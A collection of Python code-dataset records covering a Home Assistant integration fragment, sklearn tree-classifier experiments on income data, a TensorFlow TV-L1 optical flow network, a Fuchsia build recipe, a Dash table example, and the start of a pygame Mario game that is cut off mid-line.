\"\"\"Unload a config entry.\"\"\"\r\n mikrotik_controller = hass.data[DOMAIN][DATA_CLIENT][config_entry.entry_id]\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"sensor\")\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"binary_sensor\")\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"device_tracker\")\r\n await hass.config_entries.async_forward_entry_unload(config_entry, \"switch\")\r\n await mikrotik_controller.async_reset()\r\n hass.data[DOMAIN][DATA_CLIENT].pop(config_entry.entry_id)\r\n return True\r\n","sub_path":"custom_components/mikrotik_router/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"61107518","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing, tree\nfrom sklearn.model_selection import KFold,train_test_split, GridSearchCV\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, AdaBoostClassifier\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\npath = \"data/income.csv\" ##change this to your path\n\ntest_size = 0.15\nN_FOLDS = 3\nMIN_DEPTH = 2\nMIN_FEATURES = 6\nMAX_DEPTH = 5\nMAX_FEATURES = 10\nrandom_state = 100\n\n##choose which function to call\nshow = \"con\" ##{\"baseline\",\"single\",\"random\",\"gb\",\"ada\",\"con\"}\n\ndef load_and_preprocess_data(path):\n ##read csv and define columns\n names_list = [\"age\", \"workclass\", \"education\", \"education-num\", \"martial-status\", \"occupation\", \"relationship\",\n \"race\",\n \"sex\", \"capital-gain\", \"capital-loss\", \"hours-per-week\", \"native-country\", \"income\"]\n\n df = pd.read_csv(path, header=None)\n df.columns = names_list\n print(df.head())\n print(\"rows: \" + str(df.shape[0]))\n print(\"columns: \" + str(df.shape[1]))\n\n ##transofrms labels to 1,0 and omits\n y = df[\"income\"].apply(lambda x: 0 if x == \" <=50K\" else 1)\n df = df.drop(columns=[\"income\"])\n print(\"number of examples above 50K: \" + str(y.sum()))\n print(\"number of examples below 50K: \" + str(df.shape[0] - y.sum()))\n\n ##tranforms all labels in dataframe to numeric\n for c in df.columns:\n if df[c].dtype == 'object':\n lbl = preprocessing.LabelEncoder()\n lbl.fit(list(df[c].values))\n df[c] = lbl.transform(list(df[c].values))\n\n ##checks no values are NAN, so we dont need to deal with it\n assert (np.sum(df.isnull().sum(axis=0)) == 0)\n\n features = df\n\n features_train, features_test, y_train, y_test = train_test_split(features.values,\n y.values,\n test_size=test_size,\n random_state=random_state)\n return features_train, features_test, y_train, y_test\n\n\n# baseline\ndef baseline_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n defines simple baseline - always choose 1 on test set for example\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n y = np.concatenate((y_train, y_test))\n features = np.concatenate((features_train, features_test))\n kf = KFold(n_splits=N_FOLDS)\n total_acc = []\n for train_index, test_index in kf.split(features):\n y_train, y_test = y[train_index], y[test_index]\n test_baseline = np.ones(len(test_index))\n acc = np.mean(np.abs(test_baseline - y_test))\n total_acc.append(acc)\n baseline_mean_acc = sum(total_acc) / len(total_acc) * 100\n print(\"baseline accuracy: \" + str(baseline_mean_acc))\n # baseline accuracy: 75.91904694533844\n\n\n# single tree\ndef single_tree_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n performs single decision tree accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n\n param_dist = {'max_depth': range(MIN_DEPTH, MAX_DEPTH + 1),\n 'max_features': range(MIN_FEATURES, MAX_FEATURES + 1),\n 'criterion': ['gini', 'entropy']}\n tree_model = tree.DecisionTreeClassifier(random_state=random_state)\n\n cv = GridSearchCV(tree_model, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1)\n cv.fit(features_train, y_train)\n print(\"best params:\")\n print(cv.best_params_)\n tree_model.set_params(criterion=cv.best_params_['criterion'],\n max_depth=cv.best_params_['max_depth'],\n max_features=cv.best_params_['max_features'])\n print(\"Decision Tree accuracy\")\n tree_model.fit(X=features_train, y=y_train)\n acc = tree_model.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'criterion': 'gini', 'max_depth': 9, 'max_features': 7}\n # Decision Tree accuracy\n # 85.42476970317297\n\n\ndef random_forest_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n performs random forest accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n param_dist = {'max_depth': range(MIN_DEPTH, MAX_DEPTH + 1),\n 'max_features': range(MIN_FEATURES, MAX_FEATURES + 1)}\n random_forest_model = RandomForestClassifier(n_estimators=100,\n min_samples_leaf=8,\n n_jobs=-1,\n random_state=random_state)\n cv = GridSearchCV(random_forest_model, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1, verbose=5)\n cv.fit(features_train, y_train)\n print(\"best params:\")\n print(cv.best_params_)\n random_forest_model.set_params(max_depth=cv.best_params_['max_depth'],\n max_features=cv.best_params_['max_features'])\n print(\"Random Forest accuracy\")\n random_forest_model.fit(X=features_train, y=y_train)\n acc = random_forest_model.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'max_depth': 12, 'max_features': 10}\n # Random Forest accuracy\n # 86.85772773797339\n\n\ndef gradient_boosting_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n performs gradient boosting accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n learning_rate = 0.8\n param_dist = {'max_depth': range(MIN_DEPTH, MAX_DEPTH + 1),\n 'max_features': range(MIN_FEATURES, MAX_FEATURES + 1)}\n gb_tree = GradientBoostingClassifier(n_estimators=50,\n min_samples_leaf=8,\n learning_rate=learning_rate,\n random_state=random_state)\n cv = GridSearchCV(gb_tree, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1, verbose=5)\n cv.fit(features_train, y_train)\n print(\"best params:\")\n print(cv.best_params_)\n gb_tree.set_params(max_depth=cv.best_params_['max_depth'],\n max_features=cv.best_params_['max_features'])\n print(\"Gradient Boost accuracy\")\n gb_tree.fit(X=features_train, y=y_train)\n acc = gb_tree.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'max_depth': 3, 'max_features': 8}\n # Gradient Boost accuracy\n # 87.34902763561925\n\n\ndef ada_boosting_acc(features_train, features_test, y_train, y_test):\n \"\"\"\n performs adaptive boosting accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n learning_rates = np.arange(0.1, 0.22, 0.02)\n # algorithms = ['SAMME', 'SAMME.R']\n param_dist = {'learning_rate': list(learning_rates)}\n\n tree_model = tree.DecisionTreeClassifier(random_state=random_state,\n criterion='gini',\n max_depth=9,\n max_features=7)\n\n ada_tree = AdaBoostClassifier(base_estimator=tree_model,\n n_estimators=50,\n random_state=random_state,\n algorithm='SAMME')\n\n cv = GridSearchCV(ada_tree, cv=N_FOLDS,\n param_grid=param_dist,\n n_jobs=-1, verbose=5)\n\n cv.fit(features_train, y_train)\n\n print(\"best params:\")\n print(cv.best_params_)\n ada_tree.set_params(learning_rate=cv.best_params_['learning_rate'])\n print(\"Adaptive Boost accuracy\")\n ada_tree.fit(X=features_train, y=y_train)\n acc = ada_tree.score(X=features_test, y=y_test) * 100\n print(acc)\n # best params:\n # {'learning_rate': 0.18000000000000002}\n # Adaptive Boost accuracy\n # 87.34902763561925\n\n\ndef draw_confusion_mat(features_train, features_test, y_train, y_test):\n \"\"\"\n draws confusion matrices for each configuration\n performs single decision tree accuracy test\n :param features_train: train features vector\n :param features_test: test features vector\n :param y_train: train labels\n :param y_test: test labels\n \"\"\"\n tree_model = tree.DecisionTreeClassifier(random_state=random_state,\n criterion='gini',\n max_depth=9,\n max_features=7)\n\n random_forest_model = RandomForestClassifier(n_estimators=100,\n min_samples_leaf=8,\n n_jobs=-1,\n max_depth=12,\n max_features=10,\n random_state=random_state)\n\n gb_tree = GradientBoostingClassifier(n_estimators=50,\n min_samples_leaf=8,\n learning_rate=0.8,\n random_state=random_state,\n max_depth=3,\n max_features=8)\n\n ada_tree = AdaBoostClassifier(base_estimator=tree_model,\n learning_rate=0.18,\n n_estimators=50,\n random_state=random_state,\n algorithm='SAMME')\n models = [tree_model,random_forest_model,gb_tree,ada_tree]\n models_names = [\"Decision Tree\",\"Random Forest\",\"Gradient Boost\",\"Adaptive Boosting\"]\n labels = [\"below 50K\",\"above 50K\"]\n cmap = \"YlGnBu\"\n for model_name,model in zip(models_names,models):\n model.fit(X=features_train,y=y_train)\n predictions = model.predict(X=features_test)\n conf_mat = confusion_matrix(predictions,y_test)\n conf_mat = conf_mat.astype(float) / np.sum(conf_mat)\n sns.heatmap(conf_mat, annot=True, fmt='f', cbar=False,cmap=cmap,yticklabels=labels,xticklabels=labels)\n plt.xlabel('Actual Values')\n plt.ylabel('Predicted Values')\n plt.title('Predicted vs. Actual Confusion Matrix for ' + model_name + ' model')\n plt.show()\n\n\n\nif __name__ == \"__main__\":\n\n features_train, features_test, y_train, y_test = load_and_preprocess_data(path)\n if show == \"baseline\":\n baseline_acc(features_train, features_test, y_train, y_test)\n elif show == \"single\":\n single_tree_acc(features_train, features_test, y_train, y_test)\n elif show == \"random\":\n random_forest_acc(features_train, features_test, y_train, y_test)\n elif show == \"gb\":\n gradient_boosting_acc(features_train, features_test, y_train, y_test)\n elif show == \"ada\":\n ada_boosting_acc(features_train, features_test, y_train, y_test)\n else:\n draw_confusion_mat(features_train, features_test, y_train, y_test)\n","sub_path":"algorithms/trees/Solution/ClassifiersTrees.py","file_name":"ClassifiersTrees.py","file_ext":"py","file_size_in_byte":11822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343048814","text":"import numpy as np\nimport tensorflow as tf\nimport spatial_transformer\n\n\nclass TVNet(object):\n GRAD_IS_ZERO = 1e-12\n\n def __init__(self):\n pass\n\n def grey_scale_image(self, x):\n assert len(x.shape) == 4\n assert x.shape[-1].value == 3, 'number of channels must be 3 (i.e. RGB)'\n\n ker_init = tf.constant_initializer([[0.114], [0.587], [0.299]])\n grey_x = tf.layers.conv2d(x, 1, [1, 1], padding='same',\n kernel_initializer=ker_init, use_bias=False, trainable=False)\n\n return tf.floor(grey_x)\n\n def normalize_images(self, x1, x2):\n reduction_axes = [i for i in xrange(1, len(x1.shape))]\n min_x1 = tf.reduce_min(x1, axis=reduction_axes)\n max_x1 = tf.reduce_max(x1, axis=reduction_axes)\n\n min_x2 = tf.reduce_min(x2, axis=reduction_axes)\n max_x2 = tf.reduce_max(x2, axis=reduction_axes)\n\n min_val = tf.minimum(min_x1, min_x2)\n max_val = tf.maximum(max_x1, max_x2)\n\n den = max_val - min_val\n\n expand_dims = [-1 if i == 0 else 1 for i in xrange(len(x1.shape))]\n min_val_ex = tf.reshape(min_val, expand_dims)\n den_ex = tf.reshape(den, expand_dims)\n\n x1_norm = tf.where(den > 0, 255. * (x1 - min_val_ex) / den_ex, x1)\n x2_norm = tf.where(den > 0, 255. * (x2 - min_val_ex) / den_ex, x2)\n\n return x1_norm, x2_norm\n\n def gaussian_smooth(self, x):\n assert len(x.shape) == 4\n ker_init = tf.constant_initializer([[0.000874, 0.006976, 0.01386, 0.006976, 0.000874],\n [0.006976, 0.0557, 0.110656, 0.0557, 0.006976],\n [0.01386, 0.110656, 0.219833, 0.110656, 0.01386],\n [0.006976, 0.0557, 0.110656, 0.0557, 0.006976],\n [0.000874, 0.006976, 0.01386, 0.006976, 0.000874]])\n smooth_x = tf.layers.conv2d(x, x.shape[-1].value, [5, 5], padding='same',\n kernel_initializer=ker_init, use_bias=False, trainable=False)\n\n return smooth_x\n\n def warp_image(self, x, u, v):\n assert len(x.shape) == 4\n assert len(u.shape) == 3\n assert len(v.shape) == 3\n u = u / x.shape[2].value * 2\n v = v / x.shape[1].value * 2\n\n delta = tf.concat(axis=1, values=[u, v])\n return spatial_transformer.transformer(x, delta, (x.shape[-3].value, x.shape[-2].value))\n\n def centered_gradient(self, x, name):\n assert len(x.shape) == 4\n\n with tf.variable_scope('centered_gradient'):\n x_ker_init = tf.constant_initializer([[-0.5, 0, 0.5]])\n diff_x = tf.layers.conv2d(x, x.shape[-1].value, [1, 3], padding='same',\n kernel_initializer=x_ker_init, use_bias=False, name=name + '_diff_x',\n trainable=False)\n\n y_ker_init = tf.constant_initializer([[-0.5], [0], [0.5]])\n diff_y = tf.layers.conv2d(x, x.shape[-1].value, [3, 1], padding='same',\n kernel_initializer=y_ker_init, use_bias=False, name=name + '_diff_y',\n trainable=False)\n\n # refine the boundary\n first_col = 0.5 * (tf.slice(x, [0, 0, 1, 0], [-1, x.shape[1].value, 1, x.shape[3].value]) -\n tf.slice(x, [0, 0, 0, 0], [-1, x.shape[1].value, 1, x.shape[3].value]))\n\n last_col = 0.5 * (\n tf.slice(x, [0, 0, x.shape[2].value - 1, 0], [-1, x.shape[1].value, 1, x.shape[3].value]) -\n tf.slice(x, [0, 0, x.shape[2].value - 2, 0], [-1, x.shape[1].value, 1, x.shape[3].value]))\n diff_x_valid = tf.slice(diff_x, begin=[0, 0, 1, 0],\n size=[-1, x.shape[1].value, x.shape[2].value - 2, x.shape[3].value])\n diff_x = tf.concat(axis=2, values=[first_col, diff_x_valid, last_col])\n\n first_row = 0.5 * (tf.slice(x, [0, 1, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]) -\n tf.slice(x, [0, 0, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]))\n last_row = 0.5 * (\n tf.slice(x, [0, x.shape[1].value - 1, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]) -\n tf.slice(x, [0, x.shape[1].value - 2, 0, 0], [-1, 1, x.shape[2].value, x.shape[3].value]))\n diff_y_valid = tf.slice(diff_y, begin=[0, 1, 0, 0],\n size=[-1, x.shape[1].value - 2, x.shape[2].value, x.shape[3].value])\n diff_y = tf.concat(axis=1, values=[first_row, diff_y_valid, last_row])\n\n return diff_x, diff_y\n\n def forward_gradient(self, x, name):\n assert len(x.shape) == 4\n\n with tf.variable_scope('forward_gradient'):\n x_ker_init = tf.constant_initializer([[-1, 1]])\n diff_x = tf.layers.conv2d(x, x.shape[-1].value, [1, 2], padding='same',\n kernel_initializer=x_ker_init, use_bias=False, name=name + '_diff_x',\n trainable=True)\n\n y_ker_init = tf.constant_initializer([[-1], [1]])\n diff_y = tf.layers.conv2d(x, x.shape[-1].value, [2, 1], padding='same',\n kernel_initializer=y_ker_init, use_bias=False, name=name + '_diff_y',\n trainable=True)\n\n # refine the boundary\n diff_x_valid = tf.slice(diff_x, begin=[0, 0, 0, 0],\n size=[-1, x.shape[1].value, x.shape[2].value - 1, x.shape[3].value])\n last_col = tf.zeros([tf.shape(x)[0], x.shape[1].value, 1, x.shape[3].value], dtype=tf.float32)\n diff_x = tf.concat(axis=2, values=[diff_x_valid, last_col])\n\n diff_y_valid = tf.slice(diff_y, begin=[0, 0, 0, 0],\n size=[-1, x.shape[1].value - 1, x.shape[2].value, x.shape[3].value])\n last_row = tf.zeros([tf.shape(x)[0], 1, x.shape[2].value, x.shape[3].value], dtype=tf.float32)\n diff_y = tf.concat(axis=1, values=[diff_y_valid, last_row])\n\n return diff_x, diff_y\n\n def divergence(self, x, y, name):\n assert len(x.shape) == 4\n\n with tf.variable_scope('divergence'):\n x_valid = tf.slice(x, begin=[0, 0, 0, 0],\n size=[-1, x.shape[1].value, x.shape[2].value - 1, x.shape[3].value])\n first_col = tf.zeros([tf.shape(x)[0], x.shape[1].value, 1, x.shape[3].value], dtype=tf.float32)\n x_pad = tf.concat(axis=2, values=[first_col, x_valid])\n\n y_valid = tf.slice(y, begin=[0, 0, 0, 0],\n size=[-1, y.shape[1].value - 1, y.shape[2].value, y.shape[3].value])\n first_row = tf.zeros([tf.shape(y)[0], 1, y.shape[2].value, y.shape[3].value], dtype=tf.float32)\n y_pad = tf.concat(axis=1, values=[first_row, y_valid])\n\n x_ker_init = tf.constant_initializer([[-1, 1]])\n diff_x = tf.layers.conv2d(x_pad, x.shape[-1].value, [1, 2], padding='same',\n kernel_initializer=x_ker_init, use_bias=False, name=name + '_diff_x',\n trainable=True)\n\n y_ker_init = tf.constant_initializer([[-1], [1]])\n diff_y = tf.layers.conv2d(y_pad, y.shape[-1].value, [2, 1], padding='same',\n kernel_initializer=y_ker_init, use_bias=False, name=name + '_diff_y',\n trainable=True)\n\n div = diff_x + diff_y\n return div\n\n def zoom_size(self, height, width, factor):\n new_height = int(float(height) * factor + 0.5)\n new_width = int(float(width) * factor + 0.5)\n\n return new_height, new_width\n\n def zoom_image(self, x, new_height, new_width):\n assert len(x.shape) == 4\n\n delta = tf.zeros((tf.shape(x)[0], 2, new_height * new_width))\n zoomed_x = spatial_transformer.transformer(x, delta, (new_height, new_width))\n return tf.reshape(zoomed_x, [tf.shape(x)[0], new_height, new_width, x.shape[-1].value])\n\n def dual_tvl1_optic_flow(self, x1, x2, u1, u2,\n tau=0.25, # time step\n lbda=0.15, # weight parameter for the data term\n theta=0.3, # weight parameter for (u - v)^2\n warps=5, # number of warpings per scale\n max_iterations=5 # maximum number of iterations for optimization\n ):\n\n l_t = lbda * theta\n taut = tau / theta\n\n diff2_x, diff2_y = self.centered_gradient(x2, 'x2')\n\n p11 = p12 = p21 = p22 = tf.zeros_like(x1)\n\n for warpings in xrange(warps):\n with tf.variable_scope('warping%d' % (warpings,)):\n u1_flat = tf.reshape(u1, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n u2_flat = tf.reshape(u2, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n\n x2_warp = self.warp_image(x2, u1_flat, u2_flat)\n x2_warp = tf.reshape(x2_warp, tf.shape(x2))\n\n diff2_x_warp = self.warp_image(diff2_x, u1_flat, u2_flat)\n diff2_x_warp = tf.reshape(diff2_x_warp, tf.shape(diff2_x))\n\n diff2_y_warp = self.warp_image(diff2_y, u1_flat, u2_flat)\n diff2_y_warp = tf.reshape(diff2_y_warp, tf.shape(diff2_y))\n\n diff2_x_sq = tf.square(diff2_x_warp)\n diff2_y_sq = tf.square(diff2_y_warp)\n\n grad = diff2_x_sq + diff2_y_sq + self.GRAD_IS_ZERO\n\n rho_c = x2_warp - diff2_x_warp * u1 - diff2_y_warp * u2 - x1\n\n for ii in xrange(max_iterations):\n with tf.variable_scope('iter%d' % (ii,)):\n rho = rho_c + diff2_x_warp * u1 + diff2_y_warp * u2 + self.GRAD_IS_ZERO;\n\n masks1 = rho < -l_t * grad\n d1_1 = tf.where(masks1, l_t * diff2_x_warp, tf.zeros_like(diff2_x_warp))\n d2_1 = tf.where(masks1, l_t * diff2_y_warp, tf.zeros_like(diff2_y_warp))\n\n masks2 = rho > l_t * grad\n d1_2 = tf.where(masks2, -l_t * diff2_x_warp, tf.zeros_like(diff2_x_warp))\n d2_2 = tf.where(masks2, -l_t * diff2_y_warp, tf.zeros_like(diff2_y_warp))\n\n masks3 = (~masks1) & (~masks2) & (grad > self.GRAD_IS_ZERO)\n d1_3 = tf.where(masks3, -rho / grad * diff2_x_warp, tf.zeros_like(diff2_x_warp))\n d2_3 = tf.where(masks3, -rho / grad * diff2_y_warp, tf.zeros_like(diff2_y_warp))\n\n v1 = d1_1 + d1_2 + d1_3 + u1\n v2 = d2_1 + d2_2 + d2_3 + u2\n\n u1 = v1 + theta * self.divergence(p11, p12, 'div_p1')\n u2 = v2 + theta * self.divergence(p21, p22, 'div_p2')\n\n u1x, u1y = self.forward_gradient(u1, 'u1')\n u2x, u2y = self.forward_gradient(u2, 'u2')\n\n p11 = (p11 + taut * u1x) / (\n 1.0 + taut * tf.sqrt(tf.square(u1x) + tf.square(u1y) + self.GRAD_IS_ZERO));\n p12 = (p12 + taut * u1y) / (\n 1.0 + taut * tf.sqrt(tf.square(u1x) + tf.square(u1y) + self.GRAD_IS_ZERO));\n p21 = (p21 + taut * u2x) / (\n 1.0 + taut * tf.sqrt(tf.square(u2x) + tf.square(u2y) + self.GRAD_IS_ZERO));\n p22 = (p22 + taut * u2y) / (\n 1.0 + taut * tf.sqrt(tf.square(u2x) + tf.square(u2y) + self.GRAD_IS_ZERO));\n\n return u1, u2, rho\n\n def tvnet_flow(self, x1, x2,\n tau=0.25, # time step\n lbda=0.15, # weight parameter for the data term\n theta=0.3, # weight parameter for (u - v)^2\n warps=5, # number of warpings per scale\n zfactor=0.5, # factor for building the image piramid\n max_scales=5, # maximum number of scales for image piramid\n max_iterations=5 # maximum number of iterations for optimization\n ):\n\n for i in xrange(len(x1.shape)):\n assert x1.shape[i].value == x2.shape[i].value\n\n zfactor = np.float32(zfactor)\n\n height = x1.shape[-3].value\n width = x1.shape[-2].value\n\n n_scales = 1 + np.log(np.sqrt(height ** 2 + width ** 2) / 4.0) / np.log(1 / zfactor);\n n_scales = min(n_scales, max_scales)\n # n_scales = 1\n with tf.variable_scope('tvl1_flow'):\n grey_x1 = self.grey_scale_image(x1)\n grey_x2 = self.grey_scale_image(x2)\n norm_imgs = self.normalize_images(grey_x1, grey_x2)\n\n smooth_x1 = self.gaussian_smooth(norm_imgs[0])\n smooth_x2 = self.gaussian_smooth(norm_imgs[1])\n for ss in xrange(n_scales - 1, -1, -1):\n with tf.variable_scope('scale%d' % ss):\n down_sample_factor = zfactor ** ss\n down_height, down_width = self.zoom_size(height, width, down_sample_factor)\n\n if ss == n_scales - 1:\n u1 = tf.get_variable('u1', shape=[1, down_height, down_width, 1], dtype=tf.float32,\n initializer=tf.zeros_initializer)\n u2 = tf.get_variable('u2', shape=[1, down_height, down_width, 1], dtype=tf.float32,\n initializer=tf.zeros_initializer)\n u1 = tf.tile(u1, [tf.shape(smooth_x1)[0], 1, 1, 1])\n u2 = tf.tile(u2, [tf.shape(smooth_x1)[0], 1, 1, 1])\n\n down_x1 = self.zoom_image(smooth_x1, down_height, down_width)\n down_x2 = self.zoom_image(smooth_x2, down_height, down_width)\n\n u1, u2, rho = self.dual_tvl1_optic_flow(down_x1, down_x2, u1, u2,\n tau=tau, lbda=lbda, theta=theta, warps=warps,\n max_iterations=max_iterations)\n\n if ss == 0:\n return u1, u2, rho\n\n up_sample_factor = zfactor ** (ss - 1)\n up_height, up_width = self.zoom_size(height, width, up_sample_factor)\n u1 = self.zoom_image(u1, up_height, up_width) / zfactor\n u2 = self.zoom_image(u2, up_height, up_width) / zfactor\n\n def get_loss(self, x1, x2,\n tau=0.25, # time step\n lbda=0.15, # weight parameter for the data term\n theta=0.3, # weight parameter for (u - v)^2\n warps=5, # number of warpings per scale\n zfactor=0.5, # factor for building the image piramid\n max_scales=5, # maximum number of scales for image piramid\n max_iterations=5 # maximum number of iterations for optimization\n ):\n\n u1, u2, rho = self.tvnet_flow(x1, x2,\n tau=tau, lbda=lbda, theta=theta, warps=warps,\n zfactor=zfactor, max_scales=max_scales,\n max_iterations=max_iterations)\n\n # computing loss\n u1x, u1y = self.forward_gradient(u1, 'u1')\n u2x, u2y = self.forward_gradient(u2, 'u2')\n\n\n u1_flat = tf.reshape(u1, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n u2_flat = tf.reshape(u2, (tf.shape(x2)[0], 1, x2.shape[1].value * x2.shape[2].value))\n\n x2_warp = self.warp_image(x2, u1_flat, u2_flat)\n x2_warp = tf.reshape(x2_warp, tf.shape(x2))\n loss = lbda * tf.reduce_mean(tf.abs(x2_warp - x1)) + tf.reduce_mean(\n tf.abs(u1x) + tf.abs(u1y) + tf.abs(u2x) + tf.abs(u2y))\n return loss, u1, u2\n","sub_path":"tvnet.py","file_name":"tvnet.py","file_ext":"py","file_size_in_byte":16149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"614336305","text":"# Copyright 2017 The Fuchsia Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n\"\"\"Recipe for building Isolate Test.\"\"\"\n\nfrom recipe_engine.recipe_api import Property\nfrom recipe_engine import config\n\n\nDEPS = [\n 'infra/jiri',\n 'recipe_engine/path',\n 'recipe_engine/properties',\n 'recipe_engine/step',\n]\n\nPROPERTIES = {\n 'category': Property(kind=str, help='Build category', default=None),\n 'patch_gerrit_url': Property(kind=str, help='Gerrit host', default=None),\n 'patch_project': Property(kind=str, help='Gerrit project', default=None),\n 'patch_ref': Property(kind=str, help='Gerrit patch ref', default=None),\n 'patch_storage': Property(kind=str, help='Patch location', default=None),\n 'patch_repository_url': Property(kind=str, help='URL to a Git repository',\n default=None),\n 'manifest': Property(kind=str, help='Jiri manifest to use'),\n 'remote': Property(kind=str, help='Remote manifest repository'),\n}\n\n\ndef RunSteps(api, category, patch_gerrit_url, patch_project, patch_ref,\n patch_storage, patch_repository_url, manifest, remote):\n api.jiri.ensure_jiri()\n\n api.jiri.init()\n api.jiri.import_manifest(manifest, remote)\n api.jiri.update()\n if patch_ref is not None:\n api.jiri.patch(patch_ref, host=patch_gerrit_url)\n\n assert 'checkout' not in api.path\n api.path['checkout'] = api.path['start_dir'].join('isolate-test')\n buildtools_path = api.path['start_dir'].join('buildtools')\n out_path = api.path['start_dir'].join('out', 'Default')\n\n with api.step.nest('build'):\n api.step('gen', [buildtools_path.join('gn'), 'gen', out_path,\n '--root=%s' % api.path['start_dir'],\n '--dotfile=%s' % api.path['checkout'].join('.gn')])\n api.step('build', [buildtools_path.join('ninja'), '-C', out_path])\n\n api.step('test', [out_path.join('host_x64', 'factorial_test')])\n\n\ndef GenTests(api):\n yield api.test('ci') + api.properties(\n manifest='default',\n remote='https://fuchsia.googlesource.com/playground/isolate-test',\n )\n yield api.test('cq_try') + api.properties.tryserver(\n gerrit_project='playground/isolate-test',\n patch_gerrit_url='fuchsia-review.googlesource.com',\n manifest='default',\n remote='https://fuchsia.googlesource.com/playground/isolate-test',\n )\n","sub_path":"infra/recipes/isolate-test.py","file_name":"isolate-test.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"640160771","text":"import dash_bootstrap_components as dbc\n\nfrom .simple import table as simple_table\n\ntable = dbc.Table(\n simple_table.children[1].children,\n bordered=True,\n dark=True,\n hover=True,\n responsive=True,\n striped=True,\n)\n","sub_path":"docs/components_page/components/table/kwargs_source.py","file_name":"kwargs_source.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"284235493","text":"from ..types import Game_Object, Vector2, Entity, Rectangle, State_Machine, State\nfrom .. import settings as s\nfrom .. import sprites\nfrom .. import sounds\nfrom ..extras import accelerate, clamp, get_flipped_sprite\nfrom .. import level\nimport pygame as pg\nimport random\n\n\nclass Mario(Entity):\n def __init__(self, rect, vel = Vector2()):\n super(Mario, self).__init__(vel, rect)\n self.animation = self.Animation()\n self.action_states = State_Machine(self.Idle_State(), self)\n self.mario_states = State_Machine(self.Small_Mario(), self)\n\n self.pressed_left = False\n self.pressed_right = False\n self.spacebar = False\n self.crouch = False\n self.freeze_movement = False\n self.freeze_input = False\n\n self.flip_sprites = False\n self.to_menu = False\n\n self.start_height = 0\n\n def __getattr__(self, name):\n if name == 'current_action_state':\n return self.action_states.get_state()\n elif name == 'pos':\n return self.rect.pos\n elif name == 'current_mario_state':\n return self.mario_states.get_state()\n return object.__getattribute__(self, name)\n\n def draw(self):\n if s.camera.contains(self.rect):\n view_pos = s.camera.to_view_space(self.pos)\n if self.flip_sprites:\n flipped_sprite = get_flipped_sprite(self.animation.current_sprite)\n s.screen.blit(sprites.tile_set_flipped, (view_pos.x, view_pos.y), flipped_sprite)\n else:\n s.screen.blit(sprites.tile_set, (view_pos.x, view_pos.y), self.animation.current_sprite)\n\n def update(self):\n # Take input and update\n if not self.freeze_input:\n if s.keys[pg.K_LEFT] and not s.keys[pg.K_RIGHT]:\n self.pressed_left = True\n s.ACCELERATION = -s.MARIO_ACCELERATION\n elif s.keys[pg.K_RIGHT] and not s.keys[pg.K_LEFT]:\n self.pressed_right = True\n s.ACCELERATION = s.MARIO_ACCELERATION\n else:\n s.ACCELERATION = 0\n \n if not s.keys[pg.K_LEFT]:\n self.pressed_left = False\n if not s.keys[pg.K_RIGHT]:\n self.pressed_right = False\n\n if s.keys[pg.K_SPACE] and not self.spacebar:\n self.spacebar = True\n self.action_states.on_event('jump')\n \n if not s.keys[pg.K_SPACE]:\n self.spacebar = False\n\n if s.keys[pg.K_DOWN]:\n self.crouch = True\n else:\n self.crouch = False\n\n def physics_update(self):\n # Input response\n if self.current_mario_state != 'Invincible_Mario':\n self.mario_states.update()\n\n if not self.freeze_movement:\n self.state_events()\n self.action_states.update()\n self.movement()\n\n if self.pos.y > self.start_height:\n self.action_states.on_event('no jump')\n \n self.check_flip_sprites()\n\n if self.current_mario_state == 'Invincible_Mario':\n self.mario_states.update()\n\n self.rect.h = self.animation.current_sprite[3]\n\n if self.pos.y > s.SCREEN_SIZE.y:\n self.mario_states.on_event('dead')\n\n def movement(self):\n #Movement miss.\n accelerate(self, s.ACCELERATION, s.GRAVITY, s.MAX_VEL)\n self.vel.x *= s.FRICTION\n self.move()\n\n def check_flip_sprites(self):\n # flip if dead\n if self.vel.x < 0:\n self.flip_sprites = True\n elif self.vel.x > 0:\n self.flip_sprites = False\n\n def state_events(self):\n # Change states and follow suit\n if any(self.current_action_state == state for state in 